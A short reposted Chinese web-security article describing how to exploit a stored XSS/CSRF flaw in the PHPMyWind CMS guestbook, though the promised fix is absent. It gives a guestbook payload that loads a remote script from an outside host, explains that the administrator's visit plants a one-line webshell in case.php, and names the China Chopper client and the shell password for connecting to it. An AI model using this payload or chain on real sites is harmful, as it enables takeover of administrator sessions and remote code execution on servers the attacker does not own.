phpmywind留言板xss & csrf漏洞及修复 - 网站安全-自学php网

主页 > 后端 > 网站安全 >

phpmywind留言板xss & csrf漏洞及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 13:02 作者：阅读:次

[导读] 这个漏洞在法客论坛公布的，我也发一下。漏洞利用条件留言代码scriptsrc=http:// www.2cto.com /admin/Inc/mywind.js/script接下来就是等了这个是个新出的 cms 管理员肯定会去猛看留言每天访问 cas...

这个漏洞在法客论坛公布的，我也发一下。

漏洞利用条件

留言代码

<script src=”http:// www.2cto.com /admin/Inc/mywind.js”></script>

接下来就是等了这个是个新出的 cms 管理员肯定会去猛看留言每天访问 case.php

http://www.2cto.com /case.php

然后等待这个页面变空白

管理员后台点击留言板就会变空白然后就一句话

然后菜刀一句话连接密码： sex()

这样就可以了

摘自 http://madman.in/madman5/365.html

渗透南茜学院 - 网站安全 - 自学php

Shell脚本防攻击一例 - 网站安全 - 自学php

最新评论

加载更多~~

添加评论

更多文章推荐

Windows XP注册表精解(中) - Windows操作系统 - 自学 2015-04-17
WeBid 1.0.6 SQL注射及修复 - 网站安全 - 自学php 2015-04-17
DedeCMS全版本通杀SQL注入(无任何限制) - 网站安全 2015-04-16
HDWiKi(互动百科)V5.1两枚注入及修复 - 网站安全 2015-04-17
思维内容管理系统(CMSware 2.7 pro)后台拿Shell - 网站 2015-04-17
PHPCMS V9 支付模块注入漏洞及修复 - 网站安全 - 自 2015-04-17
搜狐视频漏洞可强刷无线VIP漏洞 - 网站安全 - 自 2015-04-16
无敌强大的Shell脚本查杀各种PHP后门和Webshell - 网 2015-04-17
KCFinder 2.51本地文件泄露 - 网站安全 - 自学php 2015-04-17
没有光驱软驱照样重装系统 - Windows操作系统 - 自 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论